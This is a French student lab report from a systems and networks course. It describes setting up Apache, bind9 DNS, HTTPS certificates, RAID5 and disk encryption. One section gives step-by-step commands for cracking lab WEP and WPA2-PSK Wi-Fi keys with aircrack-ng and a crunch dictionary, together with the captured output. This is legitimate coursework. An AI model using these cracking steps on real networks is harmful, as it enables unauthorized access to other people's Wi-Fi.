{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Nom de la bibliothèque !! Descriptif !! Commande&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt-get install openssh-client&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt install openssh-server&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, SSH est déjà présent sur la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur Web Apache2 ====&lt;br /&gt;
Le logiciel libre Apache HTTP Server (Apache) est un serveur HTTP créé et maintenu au sein de la fondation Apache. C'est le serveur HTTP le plus populaire du World Wide Web. Il est distribué selon les termes de la licence Apache. &lt;br /&gt;
Pour l'installer, il faut taper la commande : &lt;br /&gt;
    apt install apache2&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur DNS bind ====&lt;br /&gt;
Le service DNS (Domain Name System) est un service TCP/IP permettant la correspondance entre un nom de domaine qualifié (FQDN : Fully Qualified Domain Name) et une adresse IP. Ainsi, grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP.Un serveur qui héberge le service DNS est appelé &amp;quot;serveur de noms&amp;quot;. Ubuntu est livré par défaut avec BIND (Berkley Internet Naming Daemon), le serveur DNS le plus utilisé sur Internet. Pour installer bind9 :&lt;br /&gt;
    apt install bind9&lt;br /&gt;
	&lt;br /&gt;
== Le Site Web : HTTP ==&lt;br /&gt;
=== Achat d'un nom de domaine ===&lt;br /&gt;
Pour la réalisation de ce TP, nous avons dû acheter un nom de domaine via le site [https://www.gandi.net/fr Gandi.net] . On retiendra que notre nom de domaine est : [https://www.ima2a5-rex4ever.site rex4ever.site].&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage apache2 ===&lt;br /&gt;
Après avoir installé Apache2 sur la machine ( [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA2a5_2019/2020_G3#Paquetages_n.C3.A9cessaires_pour_le_serveur_Web_Apache2 voir ici]), il faut le paramétrer correctement (je me suis servi de [https://doc.ubuntu-fr.org/apache2 ce site]).Pour cela, on commence configurer le '''.conf''' Pour cela, on le crée via la commande '''nano /etc/sites-available/ima2a5-rex4ever.site.conf''' et on renseigne alors dans le fichier les détails suivants :&lt;br /&gt;
    &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
        ServerName ima2a5-rex4ever.site&lt;br /&gt;
        ServerAlias www.ima2a5-rex4ever.site&lt;br /&gt;
        DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
        &amp;lt;Directory &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&amp;gt;&lt;br /&gt;
                Options +FollowSymLinks&lt;br /&gt;
                AllowOverride all&lt;br /&gt;
                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
        ErrorLog /var/log/apache2/error.ima2a5-rex4ever.site.log&lt;br /&gt;
        CustomLog /var/log/apache2/access.ima2a5-rex4ever.site.com.log combined&lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
Maintenant qu'il est configuré, on peut déployer le site via : &lt;br /&gt;
    a2ensite ima2a5-rex4ever.site&lt;br /&gt;
Puis, on recharge la configuration de l'utilitaire Apache 2 :&lt;br /&gt;
    service apache2 reload&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage du DNS ===&lt;br /&gt;
Le DNS (Domain Name Server) est un serveur qui permet de rattacher un nom à une IP et ainsi c'est lui qui permet de faire le lien entre le nom d'un site et son contenu&lt;br /&gt;
==== Glue Records sur Gandi ====&lt;br /&gt;
Le Glue Record permet de créer des alias et ainsi de lier des IP et à des noms.C'est fort pratique pour simplifier la configuration.Pour se faire il faut se rendre dans Domain , cliquer sur le nom de notre site , aller dans l'onglet Glue Records et cliquer sur ADD&lt;br /&gt;
   name : dns.ima2a5-rex4ever.site&lt;br /&gt;
   ip adresse(s) : 193.48.57.163&lt;br /&gt;
==== Affecter le DNS du coté de Gandi.net ====&lt;br /&gt;
Par défaut, les serveurs de noms (DNS) sont 3 serveurs de DNS Live Gandi, il faut ajouter les serveurs externes :&lt;br /&gt;
*ns6.gandi.net  '''217.70.177.40'''&lt;br /&gt;
*dns.ima2a5-rex4ever.site   '''193.48.57.163'''&lt;br /&gt;
'''Note:''' il faut compter 12 à 24 heures pour la propagation sur Internet.&lt;br /&gt;
==== Le paramétrage de bind9 ====&lt;br /&gt;
Le paramétrage repose sur la configuration de ses 3 fichiers :&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.options =====&lt;br /&gt;
Ce fichier permet de gérer les DNS authorisés (de manière générale) à récuperer des informations de notre site. On le modifie pour permettre au dns de gandi de récuperer les données :&lt;br /&gt;
&lt;br /&gt;
     options {&lt;br /&gt;
     &lt;br /&gt;
         // forwarders {&lt;br /&gt;
         //     0.0.0.0;&lt;br /&gt;
         // };&lt;br /&gt;
         // dnssec-validation auto;&lt;br /&gt;
         auth-nxdomain no;    # conform to RFC1035&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         '''allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };'''&lt;br /&gt;
     };&lt;br /&gt;
     &lt;br /&gt;
     '''acl &amp;quot;allowed_to_transfer&amp;quot; {'''&lt;br /&gt;
        ''' 217.70.177.40/32; // adresse IP du dns6.gandi.net'''&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.local =====&lt;br /&gt;
Il faut maintenant déclarer à Bind9 le nom de notre fichier de configuration de DNS sous forme de zone , on le fait via ce fichier. On lui renseigne la zone : &lt;br /&gt;
    &lt;br /&gt;
     zone &amp;quot;ima2a5-rex4ever.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.ima2a5-rex4ever.site&amp;quot;;&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== le fichier /etc/bind/db.ima2a5-rex4ever.site=====&lt;br /&gt;
Enfin, il faut créer le fichier de configuration précedemment appelé : &lt;br /&gt;
&lt;br /&gt;
   ;&lt;br /&gt;
   ; BIND data file for local loopback interface&lt;br /&gt;
   ;&lt;br /&gt;
   $TTL    604800&lt;br /&gt;
   @       IN      SOA     dns.ima2a5-rex4ever.site. root@ima2a5-rex4ever.site. (  &amp;lt;= METTRE UNE ADRESSE BIDON , pas necessaire&lt;br /&gt;
                           21112019        ; Serial&lt;br /&gt;
                            604800         ; Refresh&lt;br /&gt;
                             86400         ; Retry&lt;br /&gt;
                           2419200         ; Expire&lt;br /&gt;
                            604800 )       ; Negative Cache TTL&lt;br /&gt;
   ;&lt;br /&gt;
   @       IN      NS      dns.ima2a5-rex4ever.site.  &amp;lt;= DN du site &lt;br /&gt;
   @       IN      NS      ns6.gandi.net.&amp;lt;= DNS de gandi&lt;br /&gt;
   dns     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE DNS&lt;br /&gt;
   www     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE SITE&lt;br /&gt;
&lt;br /&gt;
Après 5 minutes de cuisson et avoir relancé bind9, c'est prêt le site en http est accessible et visualisable! On peut acceder au site internet http://www.ima2a5-rex4ever.site !&lt;br /&gt;
&lt;br /&gt;
== Le Site Web : HTTPS ==&lt;br /&gt;
Le SSL (Secure Socket Layer) / TLS (Transport Layer Security) est le protocole de sécurité le plus répandu qui créé un canal sécurisé entre deux machines communiquant sur Internet ou un réseau interne. Dans notre société centrée sur un Internet vulnérable, le SSL est généralement utilisé lorsqu'un navigateur doit se connecter de manière sécurisée à un serveur web.&lt;br /&gt;
&lt;br /&gt;
=== Generation d'un certificat ===&lt;br /&gt;
&lt;br /&gt;
La première étape pour générer un certificat est de concevoir un jeu de 2 clefs qui sont un '''.key''' et un '''.csr''' &lt;br /&gt;
Pour obtenir ces deux fichiers, nous utilisons l'utilitaire '''OpenSSL'''.&lt;br /&gt;
      openssl req -nodes -newkey rsa:2048 -sha256 -keyout ima2a5-rex4ever.key -out ima2a5-rex4ever.csr &lt;br /&gt;
&lt;br /&gt;
'''Mais alors comment marche cette commande?'''&lt;br /&gt;
Après avoir lu le descriptif que l'on peut obtenir via [http://www.delafond.org/traducmanfr/man/man1/openssl.1.html man openssl], il en ressort que les arguments sont :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Argument !! explication&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|req&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Gestion X.509 Certificate Signing Request (CSR). &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-nodes&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Pas de chiffrage sur la clef privée (option arbitraire no des)&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-newkey rsa:2048&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|demande de Génération d'une paire de clef RSA de 2048 bits et d'une demande de certificat.&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-keyout ima2a5-rex4ever.key&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre .key&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-out ima2a5-rex4ever.csr &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre demande de certificat .csr&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
Pour générer en bon éduforme notre demande,l'utilitaire a besoin des informations, voici ce que nous avons répondu:&lt;br /&gt;
&lt;br /&gt;
      Country Name (2 letter code) [AU]:'''FR'''&lt;br /&gt;
      State or Province Name (full name) [Some-State]:'''Nord'''&lt;br /&gt;
      Locality Name (eg, city) []:'''Lille'''&lt;br /&gt;
      Organization Name (eg, company) [Internet Widgits Pty Ltd]:'''Polytech Lille'''&lt;br /&gt;
      Organizational Unit Name (eg, section) []:'''IMA2A5'''&lt;br /&gt;
      Common Name (e.g. server FQDN or YOUR name) []:'''ima2a5-rex4ever.site'''&lt;br /&gt;
      Email Address []:'''pascal.coint@polytech-lille.net'''&lt;br /&gt;
      &lt;br /&gt;
      Please enter the following 'extra' attributes&lt;br /&gt;
      to be sent with your certificate request&lt;br /&gt;
      A challenge password []:'''glopglop!'''&lt;br /&gt;
      Optionnal informations :&lt;br /&gt;
&lt;br /&gt;
==== Affectation du certificat sur Gandi.net ====&lt;br /&gt;
Après avoir répondu , il génère alors 2 fichiers. Le '''.key''' est notre clef privée elle restera donc en notre unique possession. On partage avec gandhi (qui est également un générateur de certificat) notre '''.csr'''. Il va donc étudier la validité de notre domaine et le certifier ou non.&lt;br /&gt;
&lt;br /&gt;
''' Contenu de notre CSR'''&lt;br /&gt;
      -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
      MIIDBTCCAe0CAQAwgaUxCzAJBgNVBAYTAkZSMQ0wCwYDVQQIDAROb3JkMQ4wDAYD&lt;br /&gt;
      VQQHDAVMaWxsZTEXMBUGA1UECgwOUG9seXRlY2ggTGlsbGUxDzANBgNVBAsMBklN&lt;br /&gt;
      QTJBNTEdMBsGA1UEAwwUaW1hMmE1LXJleDRldmVyLnNpdGUxLjAsBgkqhkiG9w0B&lt;br /&gt;
      CQEWH3Bhc2NhbC5jb2ludEBwb2x5dGVjaC1saWxsZS5uZXQwggEiMA0GCSqGSIb3 &lt;br /&gt;
      DQEBAQUAA4IBDwAwggEKAoIBAQDBKS9p8572UiXo2W1dAiKEKLq+B6ge/si0AhMH&lt;br /&gt;
      fLtovMz7Xvy/9oQnq25SvkWaNRuAJrvzROGS2mzkG9IEhnEpWSTNvspTO60PgNPo&lt;br /&gt;
      EUYcgKAeEuVVJyom3K3ioBOvllucQfiOIB/ykvP80s+9Wjo2vf2PkESPTjfM0zKP&lt;br /&gt;
      2JMT9cGQV6auD7NU+Ygz7w5dW/NKkU2KZA9HQ7i95+/ST3r2T0D8xP/ltEBC0Q7i&lt;br /&gt;
      U/OVkAKn6CPJ6KtkbQYvgKVG95IM5SQb/WxRVNnHKS4f+erNFYpx5iNiHhv6larV&lt;br /&gt;
      G0oR9uNsg7tOhdhcVVnooGSAsoxtgmDLwzuuho+3fS4t1K83AgMBAAGgGjAYBgkq&lt;br /&gt;
      hkiG9w0BCQcxCwwJZ2xvcGdsb3AhMA0GCSqGSIb3DQEBCwUAA4IBAQB7jtWizvBQ&lt;br /&gt;
      dNEyyVRhS563mKFo34RWW4g5tpnPC6wepQ7tvHo6gZZtzljobsWF55lRK7/Pi8eh&lt;br /&gt;
      ANyQxb1Lo9FcHJcUOEMc8heeutSZQoCslTdRNMe+uBhQ/qCLXjy+fgdptqPi9cXP&lt;br /&gt;
      zi8gBbrAQ9sHqJPK/RwhzuhCkBSzYgoNbYLjrHf8lCe60+7+0HBKM3jpTUDmzrzg&lt;br /&gt;
      Kmb8GmkgcrzKSNhlOFZpiQqBJUfK5zJEucdhJ0j7Tupwf+J2oO+TccnCNH7o1Ykc&lt;br /&gt;
      7ANKYKpf8AoCcZenLutCXt3YGjT8INuh5SnpsyR3BZUK9hNzZGK9Ilv9hwiEnmaS&lt;br /&gt;
      PQWRkLUGQdh+&lt;br /&gt;
      -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Puis, Gandi.net va demander une méthode de vérification sur le serveur web cible afin de savoir s'il s'agit bien de notre serveur.Il existe trois possibilités:&lt;br /&gt;
*Par verification DNS&lt;br /&gt;
*Par Mail&lt;br /&gt;
*Par fichier&lt;br /&gt;
Nous avons choisi la méthode par fichier, certes un peu longue mais ne nécessitant pas l'intervention de Monsieur Redon.&lt;br /&gt;
On copie ainsi un fichier temporaire à l'endroit indiqué par gandi et on attend que gandi valide la demande.&lt;br /&gt;
Après une verification de la part de Gandi (qui nécessite plusieurs dizaines de minutes), on obtient un certificat ('''.csr''') et le certificat intermédiaire ('''.pem''')&lt;br /&gt;
Ils sont nécessaires pour la configuration du site en HTTPS.&lt;br /&gt;
&lt;br /&gt;
=== S'assurer qu'Apache écoute le port 443 (protocole https) ===&lt;br /&gt;
On sait que le protocole HTTPS se sert du port 443 pour communiquer , verifions alors que c'est bien le cas : &lt;br /&gt;
    root@ima2a5-rex4ever:/etc/apache2# netstat -tanpu |grep &amp;quot;LISTEN&amp;quot; |grep &amp;quot;443&amp;quot;&lt;br /&gt;
    tcp6       0      0 :::443                  :::*                    LISTEN      10706/apache2&lt;br /&gt;
Le résultat indique en effet que le port 443 est ecouté par apache2, ce qui signifie qu'il ne faut pas faire de configuration supplémentaire.&lt;br /&gt;
&lt;br /&gt;
=== Activation du protocole SSL ===&lt;br /&gt;
Il faut activer le module qui gère le protocole SSL via la commande : &lt;br /&gt;
   a2enmode ssl&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
=== Configuration du VirtualHost Apache pour le protocole HTTPS ===&lt;br /&gt;
Afin de ne pas saboter la configuration HTTP déjà en place, on va dupliquer la configuration disponible dans /sites-available:&lt;br /&gt;
    cp ima2a5-rex4ever.site.conf ima2a5-rex4ever.site-ssl.conf&lt;br /&gt;
Modification :&lt;br /&gt;
   &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
  #   General setup for the virtual host&lt;br /&gt;
     DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
     ServerName ima2a5-rex4ever.site:443                                                                                                                                                                                                          ServerAdmin pascal.coint@polytech-lille.net                                                                                                                                                                                                  ErrorLog &amp;quot;/usr/local/apache2/logs/error_log&amp;quot;                                                                                                                                                                                                 TransferLog &amp;quot;/usr/local/apache2/logs/access_log&amp;quot;                                                                                                                                                                                          # Activation du SSL                                                                                                                                                                                                                                SSLEngine On&lt;br /&gt;
    &lt;br /&gt;
    # Activation de tous les protocoles sécurisés (TLS v1.0, v1.1 et TLS v1.2) touut en désactivant les protocoles non sécurisés (SSL v2, SSL v3)&lt;br /&gt;
    SSLProtocol All -SSLv3 -SSLv2&lt;br /&gt;
    # Le navigateur devra choisir une méthode de chiffrement en respectant l'ordre indiquée dans SSLCipherSuite&lt;br /&gt;
    SSLHonorCipherOrder on&lt;br /&gt;
    &lt;br /&gt;
    # Chemin vers le certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.cer&amp;quot;&lt;br /&gt;
    SSLCACertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.pem&amp;quot;&lt;br /&gt;
    # Chemin vers la clée privée du certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateKeyFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.key&amp;quot;    &lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
On peut maintenant permuter les fichiers .conf et renommer notre ancien .conf en &amp;quot;ima2a5-rex4ever.site-http.conf&amp;quot;&lt;br /&gt;
'''Note :''' Comme vous aurez pu le remarquer, j'ai créer un dossier certificate dans lequel j'ai mis le .cer,le .csr,le.key et le .pem afin de ne pas les perdre.&lt;br /&gt;
On va ensuite décharger puis recharger le site :&lt;br /&gt;
   a2dissite ima2a5-rex4ever.site&lt;br /&gt;
   a2ensite ima2a5-rex4ever.site&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
Ensuite on va regarder quels sont nos sites actifs à l'aide de apache2ctl -S , ce qui retourne :&lt;br /&gt;
    *:80                   ima2a5-rex4ever.site (/etc/apache2/sites-enabled/000-default.conf:1)&lt;br /&gt;
    *:443                  ima2a5-rex4ever.site (/etc/apache2/sites-enabled/ima2a5-rex4ever.site.conf:13)&lt;br /&gt;
Le site est prêt pour le HTTPS&lt;br /&gt;
&lt;br /&gt;
=== Securisation du DNS : Le DNSSEC ===&lt;br /&gt;
Avoir un site sécurisé c'est bien , avoir toute la chaine de transmission pour éviter les fraude c'est encore mieux. Pour cela, il est possible de concevoir un DNSSEC (contraction de DNS SECURISED)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Attaque d'une installation Wi-fi ==&lt;br /&gt;
=== Description ===&lt;br /&gt;
Notre Client Wi-fi est un ordinateur portable fourni par Monsieur Redon. Il ne nécessite pas nécessairement de configuration. Cependant, la clef Wi-Fi fournie avec elle doit être paramétrée (la datasheet peut se trouver à l'adresse suivant ; [https://www.farnell.com/datasheets/1669935.pdf Datasheet]). De plus, il faut installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA&lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il suffit de taper la commande :&lt;br /&gt;
    apt-get install aircrack-ng&lt;br /&gt;
'''Note:''' il faut auparavant configurer le réseau pour se connecter à internet.&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de '''airmon-ng''' qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
   airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
   airmong-ng start NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
   airodump-ng --encrypt wep NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis à l'aide d'un second terminal, on peut stocker les informations volées dans un .txt :&lt;br /&gt;
   Airodump-ng FICHIER.txt -c 2 --bssid ADDRESSBSSID NOMRESEAUESPIONNABLE&lt;br /&gt;
Ce qui donne dans notre cas : &lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wep wlan0mon &lt;br /&gt;
   Airodump-ng -w reseau_1.txt -c 2 --bssid 04:DA:D2:50:53 wlan0mon   (&amp;lt;== pour le réseau cracotte 3)&lt;br /&gt;
&lt;br /&gt;
Commence alors le craquage de la clef Wifi en Wep. On estime qu'il faut capturer plus ou moins 50 000 datas pour approximer 50% de chance de craquer la clef.&lt;br /&gt;
Après 40 000 datas volées , on réussit à craquer la clef, il nous aura fallu environ '''14 minutes'''.&lt;br /&gt;
&lt;br /&gt;
    KEY FOUND! [BA:BE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44 ]&lt;br /&gt;
    Decrypted correctly : 100%&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA2-PSK ===&lt;br /&gt;
De même que précedemment, on recommence en changeant le --encrypt et on obtient :&lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wpa wlan0mon &lt;br /&gt;
On obtient les informations suivantes sur notre réseau cible : &lt;br /&gt;
Channel: 2&lt;br /&gt;
SSIDName: kracotte03&lt;br /&gt;
BSSIDAdress: 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
On peut alors espionner et voler des informations avec les '''handshakes''':&lt;br /&gt;
airodump-ng -w kracotte03 -c 2 --bssid 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
'''-w kracotte03''' indique que l'on souhaite tout enregistrer dans un fichier nommé '''kracotte03.'''. On obtient alors après un moment les datas volées et les informations sont extraites sous plusieurs formats. &lt;br /&gt;
Le format '''.cap''' est compatible avec l'utilitaire que nous allons utiliser, on le copie donc sur une clef USB et on va cracker la clef sur une zabeth (vitesse de calcul plus elevée).&lt;br /&gt;
Pour se faire , on construit un dictionnaire (ensemble possible de toutes les combinaisons) avec l'utilitaire Crunch via la commande :&lt;br /&gt;
   crunch 8 8 123456789 &amp;gt;&amp;gt; Dico.txt &lt;br /&gt;
Notre dictionnaire est largement simplifié car nous sommes au courant qu'il s'agit d'un ensemble de 8 chiffres de 1 a 9 , ce qui permet de préciser à crunch une taille min et max de 8 et les caractères admissibles de 1 à 9&lt;br /&gt;
Le dictionnaire est maintenant prêt, on lance alors le cassage de clef par force brute :&lt;br /&gt;
aircrack-ng psk-01.cap -w Dico.txt&lt;br /&gt;
&lt;br /&gt;
Après TREEEEEEEEEEEEEEEEEEEEEEEEEEEEEES Longtemps , on obtient la clef :&lt;br /&gt;
      [00:21:41] 10233332/102795810 keys tested (7985.18 k/s) &lt;br /&gt;
      &lt;br /&gt;
      Time left: 3 hours, 13 minutes, 12 seconds                 9.96%&lt;br /&gt;
                           KEY FOUND! [ 10233333 ]&lt;br /&gt;
      Master Key     : 5A D9 A4 39 7A 4E 14 A6 44 DE C4 AB FF 1E 63 D7 &lt;br /&gt;
                       46 7B F8 02 23 ED EA A9 82 3F 6A FC 68 DE F2 5D &lt;br /&gt;
      Transient Key  : 29 DA 59 3B EC 25 DB 6A 62 AD 50 2C 17 52 BC F8 &lt;br /&gt;
                       C9 CD 7C 85 A5 07 7E 44 84 B5 A6 EB 2E 47 B3 D0 &lt;br /&gt;
                       1C CC CC F8 24 EB 00 0A C0 7B B8 60 13 AE 57 74 &lt;br /&gt;
                       1E 15 A9 FC D7 A8 E5 C6 14 9B 01 60 E4 C4 96 43 &lt;br /&gt;
      EAPOL HMAC     : 15 99 D7 E0 33 B3 E1 4C 57 6F 8E E4 69 AF B0 08&lt;br /&gt;
&lt;br /&gt;
== Diverses commandes ==&lt;br /&gt;
=== Creation du Raid5 avec mdadm ===&lt;br /&gt;
Nous commencons par créer un RAID5 comme demandé dans la partie 6.1 du sujet. Pour se faire on commence par créer 3 disques de 1Go chacun:&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk1 virtual&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk2 virtual&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk3 virtual&lt;br /&gt;
On éteint la machine et on recommence la même manipulation que pour la partie 3.5.1 du wiki pour attacher disk1,disk2 et disk3.&lt;br /&gt;
Nos 3 disques sont maintenant reliées à notre machine comme on le peut voir avec la commande '''fdisk -l'''&lt;br /&gt;
&lt;br /&gt;
   Disk /dev/xvdb3: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb4: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb5: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
&lt;br /&gt;
On nous propose de réaliser le raid5 logiciel avec l'utilitaire mdadm ([https://doc.ubuntu-fr.org/raid_logiciel mdadm])&lt;br /&gt;
Assemblons maintenant nos 3 disques en un RAID5 via la commande : &lt;br /&gt;
   mdadm --create /dev/md0 --level=5  --raid-devices=3 /dev/xvdb3 /dev/xvdb4 /dev/xvdb5&lt;br /&gt;
'''Note:''' Ne pas essayer de renommer md0&lt;br /&gt;
Pour automatiser le raid5 à chaque démarrage: &lt;br /&gt;
   mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
Puis le formatage du volume RAID nouvellement créé:&lt;br /&gt;
   mkfs.ext4 /dev/md0&lt;br /&gt;
Déclarez ce volume dans `fstab` pour que le système le monte au démarrage (le système de fichier, pas le volume en lui même). Pour ce faire Editez le fichier /etc/fstab et ajoutez à sa fin la ligne :&lt;br /&gt;
   /dev/md0 	/media/raid	ext4	defaults 	0	1&lt;br /&gt;
Puis créer le fichier /media/raid qui est le fichier sur lequel le raid est monté : &lt;br /&gt;
   mkdir /media/raid&lt;br /&gt;
En retirant un disque (mise en commentaire /etc/fstab), le disque md0 est toujours actif et utilisable.&lt;br /&gt;
&lt;br /&gt;
=== Cryptage de données ===&lt;br /&gt;
Le cryptage des données s'effectue grâce à l'utilitaire [https://doc.ubuntu-fr.org/cryptsetup cryptsetup]. Pour se faire, on commence par chercher le nom de la clef USB cible dans le gestionnaire :&lt;br /&gt;
      lsblk&lt;br /&gt;
Dans notre cas,le périphérique cible est nommé '''sdb1'''&lt;br /&gt;
On va acceder aux partitions via :&lt;br /&gt;
      fdisk /dev/sdb1&lt;br /&gt;
Le menu suivant apparait alors :&lt;br /&gt;
   Welcome to fdisk (util-linux 2.25.2).&lt;br /&gt;
   Changes will remain in memory only, until you decide to write them.&lt;br /&gt;
   Be careful before using the write command.&lt;br /&gt;
   Command (m for help):&lt;br /&gt;
On va d'abord nettoyer la clef avant d'y crypter nos données, pour cela on entre le choix 'd' et on supprime les partitions existantes.&lt;br /&gt;
&lt;br /&gt;
Puis pour créer une nouvelle partition on entre le choix 'n' puis 'p' qui correspond à :&lt;br /&gt;
'''n''' nouvelle partition&lt;br /&gt;
'''p''' partition primaire&lt;br /&gt;
&lt;br /&gt;
Command (m for help): n&lt;br /&gt;
Partition type&lt;br /&gt;
   p   primary (0 primary, 0 extended, 4 free)&lt;br /&gt;
   e   extended (container for logical partitions)&lt;br /&gt;
Select (default p):&lt;br /&gt;
&lt;br /&gt;
Using default response p.&lt;br /&gt;
Partition number (1-4, default 1):&lt;br /&gt;
First sector (2048-1953525167, default 2048):&lt;br /&gt;
Last sector, +sectors or +size{K,M,G,T,P} (2048-1953525167, default 1953525167):&lt;br /&gt;
Created a new partition 1 of type 'Linux' and of size xxxx.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis on sauvegarde : &lt;br /&gt;
&lt;br /&gt;
Command (m for help): w&lt;br /&gt;
The partition table has been altered.&lt;br /&gt;
Calling ioctl() to re-read partition table.&lt;br /&gt;
Syncing disks.&lt;br /&gt;
&lt;br /&gt;
La clef est prête, on peut desormais crypter avec l'utilitaire cyptsetup &lt;br /&gt;
    cryptsetup luksFormat -c aes -h sha256 /dev/sdb1&lt;br /&gt;
    cryptsetup open --type luks /dev/sdb1 clef_ima2a_G5&lt;br /&gt;
